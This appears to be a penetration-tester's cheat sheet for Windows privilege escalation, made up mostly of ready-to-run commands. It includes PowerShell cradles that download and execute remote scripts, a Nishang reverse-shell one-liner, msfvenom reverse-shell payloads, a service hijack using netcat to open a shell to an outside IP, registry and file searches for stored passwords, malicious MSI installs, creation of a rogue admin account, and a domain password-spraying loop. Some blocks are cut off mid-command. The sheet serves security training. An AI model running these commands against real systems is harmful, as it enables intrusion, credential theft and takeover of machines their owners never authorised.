Contents
Useful links/articles:
Pretty much where I have pulled most of this content.
- Total OSCP Guide – Windows Priv Esc
- Windows: Elevating Privs by exploiting weak folder permissions
- Windows: Priv-Esc Fundamentals – Fuzzy Security
- [Tool] Windows: Priv-Esc Exploit Suggestor
- Windows Priv-Esc Commands
- Windows Privilege Escalation Encyclopedia by Insomnia Security
- Windows/Linux Port Forwarding
Windows SysInternals Tools:
SHELL UPGRADES – POWERSHELL:
Running Powershell Commands from CMD:
Basic Powershell Commands within CMD.exe:
|
1 2 3 4 |
# Simple Powershell Command powershell -command ("whoami") |
Download a File (Similar to Linux’s WGET):
|
1 2 3 4 |
# Download a file (Similar to Linux's WGET) powershell -command (new-object System.Net.WebClient).DownloadFile('http://10.10.14.19:1234/rottenpotato.exe','C:\Users\Public\potato.exe') |
Download and Import Powershell Modules:
|
1 2 3 |
powershell -c 'IEX(New-Object Net.WebClient).DownloadString(“http://<ip_address>/full_path/script_name.ps1”)' |
Getting a Reverse TCP Powershell Shell with Nishang:
|
1 2 3 4 5 6 7 8 9 |
# You have a cmd.exe shell but want a powershell: ## Start a Python HTTP Server in Nishang/Shells powershell -c (new-object System.Net.WebClient).DownloadFile('http://10.10.14.19/Invoke-PowerShellTcp.ps1','C:\Users\Public\Invoke-PowersShellTcp.ps1') # Now that you have downloaded the file, we need to import and execute: powershell -exec bypass -c Import-Module .\Invoke-PowerShellTcp.ps1;Invoke-PowerShellTcp -Reverse -IPAddress 192.168.56.104 -Port 443 |
One Liner Reverse Powershell from CMD:
|
1 2 3 |
powershell -exec bypass -c IEX (New-Object Net.WebClient).DownloadString(“http://192.168.56.104/Invoke-PowerShellTcp.ps1”);Invoke-PowerShellTcp -Reverse -IPAddress 192.168.56.104 -Port 443 |
Basic Information Gathering:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 |
# Basic Queries hostname whoami echo %USERNAME% net users net users <username> net localgroups net group /domain netstat -ano netsh firewall show state # How well is the system Patched: wmic qfe get Caption,Description,HotFixID,InstalledOn # Scheduled Tasks Query schtasks /query /fo LIST /v tasklist /SVC # Show all started Windows Services: net start # Check for 3rd party Drivers: DRIVERQUERY |
PowerSploit:
Powerview.ps1 – Queries the Domain Controller and attempts to check if you (current Windows user) have admin privileges on other hosts. If so, we can psexec to get Admin.
|
1 2 3 4 5 |
powershell -exec bypass import-module powerview.ps1 Find-LocalAdminAccess |
Working with PETools:
|
1 2 3 4 5 6 7 8 |
# How to import and use PETools from Powersploit ## Easiest way to move data is via a Python HTTP server to ## get all of the data in the PETools Directory to the Victim. Import-Module PETools.psd1 Get-Command -Module PETools |
Search for Credential Files:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
# Check for password string: findstr /si password *.txt | *.xml | *.ini dir /s *pass* == *cred* == *vnc* == *.config* findstr /spin "password" *.* findstr /spin "password" *.* # Check for common password files: dir /b /s web.config dir /b /s unattend.xml dir /b /s sysprep.inf dir /b /s sysprep.xml dir /b /s *pass* |
Search Window Registry for Passwords:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 |
# Search for Autologin Credentials: reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" # Search for VNC Password: reg query "HKCU\Software\ORL\WinVNC3\Password" # Search for Putty Creds: reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" # Search for passwords in HKLM: reg query HKLM /f password /t REG_SZ /s | clip # Search for passwords in HKCU: reg query HKCU /f password /t REG_SZ /s | clip |
Check for Local Only services:
|
1 2 3 4 5 6 7 |
# Look for local services that are listening: netstat -ano # Port forward using plink: plink.exe -l root -pw mysecretpass 192.168.0.10. -R 8080:127.0.0.1:8080 |
Windows Priv-Esc Exploit Suggestor:
Github Repository is linked above but, if you’re lazy, here it is again.
On Windows Host:
systeminfo > systeminfo.txt
Transfer the file back to kali to be run against the python exploit suggester.
On Kali host:
|
1 2 3 4 5 6 7 |
# Update the database: python windows-exploit-suggester.py -u # Use the new database against the systeminfo.txt python windows-exploit-suggester.py -d 2018-08-21-mssb.xls -i systeminfo.txt |
Windows “at” Scheduler:
This command can be used locally to get System privileges since the at system executes commands as system.
|
1 2 3 4 5 6 7 |
# Generate an evil binary: msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=443 -f exe > shell.exe # Move binary to Windows and add to at: at 13:20 /interactice shell.exe |
Scheduled Tasks:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
# Look for tasks that are run by a privileged user and run a binary that we can overwrite: schtasks /query /fo LIST /v # Copy and paste into a linux terminal and look for System: cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM # Check the binpath to your evil binary: sc config upnphost binpath= "C:\Inetpub\nc.exe 192.168.1.101 6666 -e c:\Windows\system32\cmd.exe" sc config upnphost obj= ".\LocalSystem" password= "" sc config upnphost depend= "" # Restart the service: wmic service NAMEOFSERVICE call startservice ## OR: net stop [service name] && net start [service name] |
Unquoted / Trusted Service Paths:
It happens when a developer fails to enclose the file path in quotes if that path has a space. File paths that are properly quoted are treated as absolute and therefore mitigate this vulnerability.
So if we find a file without quotes, like below, it’s vulnerable:
C:\Program Files\Some Folder\1\Service.exe
Windows would try to execute:
C:\Program.exe
C:\Program Files\Some.exe
C:\Program Files\Some Folder\Service.exe
So if we have write access on some target directory we can write a file on that directory:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 |
# Check for vulnerable programs: wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """ icacls “C:\Program Files\Some Folder” sc query sc query <service_name> # Generate Payload: msfvenom -p windows/shell_reverse_tco -e x86/shikata_ga_nai LHOST=10.0.0.100 LPORT=443 -f exe -o Privatefirewall.exe # Change Binary Path: sc config <service_name> binpath= "C:\shell.exe" # Reboot or restart service: shutdown /r /t 0 sc <servicename> stop & sc <servicename> start ## OR wmic service NAMEOFSERVICE call startservice ## OR: net stop [service name] && net start [service name] |
Check for Weak Service Permissions:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 |
# WMIC - we try this first: wmic service list brief # Get a list of services and store to file: for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> c:\windows\temp\permissions.txt # Check the permissions on the list of services: for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c icacls "%a" FOR /F %i in (services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> path.txt # SC.EXE - we try this second: sc query state= all | findstr "SERVICE_NAME:" >> Servicenames.txt FOR /F %i in (Servicenames.txt) DO echo %i type Servicenames.txt FOR /F "tokens=2 delims= " %i in (Servicenames.txt) DO @echo %i >> services.txt ## This will give us the paths, we can not run cacls "path" on each of them. # Check for Service Permissions by Auth-Type: Accesschk.exe -uwcqv “Authenticated Users” * Accesschk.exe -uwcqv “Users” * Accesschk.exe -uwcqv “Everyone” * # If you find one that has weak permissions: Accesschk.exe ucqv <Service_Name> sc qc <service_name> #We might be able to overwrite the binary the service is pointing to. sc stop upnp.exe sc config upnp.exe binpath= “net user lokii lokii /add” sc start upnp.exe net user #Check to see if the user has been added to host machine. |
Check for Weak File Permissions:
|
1 2 3 4 5 |
Accesschk.exe -uwcqv “Authenticated Users” * Accesschk.exe -uwcqv “Users” * Accesschk.exe -uwcqv “Everyone” * |
Check Program Files for Writeable Objects:
|
1 2 3 |
cacls "c:\Program Files" /T | findstr Users |
Check for AlwaysInstallElevated Group Policy Setting:
This setting installs all .msi packages with system privileges for everyone.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 |
# REG_DWORD 0x01 signifies that yes, AlwaysInstall Elevated is set and on reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer \v AlwaysInstallElevated # REG_DWORD 0x01 signifies that yes, AlwaysInstall Elevated is set and on reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer \v AlwaysInstallElevated #---------------------------------------------------# # Initial MSI Payload: # #---------------------------------------------------# # If the bit is set then we: msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.56.101 lport=443 –f msi > shell.msi # Upload the shell to the Windows host using whatever method tickles your fancy and run: msiexec /quiet /qn /i 1.msi #----------------------------------------------------# # Secondary MSI Payload: # #----------------------------------------------------# # We add a user in windows and create a secondary payload to add to administrators: net user lokii lokii /add msfvenom -p windows/exec CMD='net localgroup administrators lokii /add' -f msi > upgrade.msi |
/quiet = Suppress any messages to the user during installation
/qn = No GUI
/i = Regular (vs. administrative) installation
Password Spraying:
A loop that iterated over all the users in users.txt and tries all the passwords listed in
pass.txt . Can be used with the net user /domain command listed above for every user in the domain.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
# Get a list of users: net user /domain > users.txt # Run the following script: @FOR /F %n in (users.txt) DO @FOR / F %p in (pass.txt) DO @net use \\[DOMAINCONTROLLER]\IPC$ /user:[DOMAIN]\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\[DOMAINCONTROLLER]IPC$ > NULL # Example: net user /domain > DomainUsers.txt echo "Password1" >> pass.txt echo "1q2w3e4r" >> pass.txt @FOR /F %n in (DomainUsers.txt) DO @FOR /F %p in (pass.txt) DO @net use \\COMPANYDC1\ |
Using Procmon.exe to check for “NAME NOT FOUND” dll’s:
Simply use a DLL written in C++ in which DLLMain contains malicious code or points to a malicious function in the code such as a shellcode loader or downloader/executor.
- Download procmon.exe
- execute on Windows machine and set the following filters:
Check the UPNP Server on Older Machines:
|
1 2 3 4 5 6 7 8 9 10 |
# Check to see if UPNPHOST is running and its dependencies sc qc upnphost # Attempt to overwrite the binpath: sc config upnphost binpath= "C:\evil.exe" sc config upnphost obj= ".\LocalStation" password= "" sc qc upnphost net start upnphost |
Windows XP and Older:
If you have a GUI with a user that is included in Administrators group you first need to open up cmd.exefor the administrator. If you open up the cmd that is in Accessories it will be opened up as a normal user. And if you rightclick and do Run as Administrator you might need to know the Administrators password. Which you might not know. So instead you open up the cmd from c:\windows\system32\cmd.exe. This will give you a cmd with Administrators rights.
From here we want to become SYSTEM user. To do this we run:
First we check what time it is on the local machine:
|
1 2 3 4 5 6 |
time # Now we set the time we want the system CMD to start. Probably one minuter after the time. at 01:23 /interactive cmd.exe |
Vista and Newer:
Get Psexec onto the system and run:
|
1 2 3 |
psexec -i -s cmd.exe |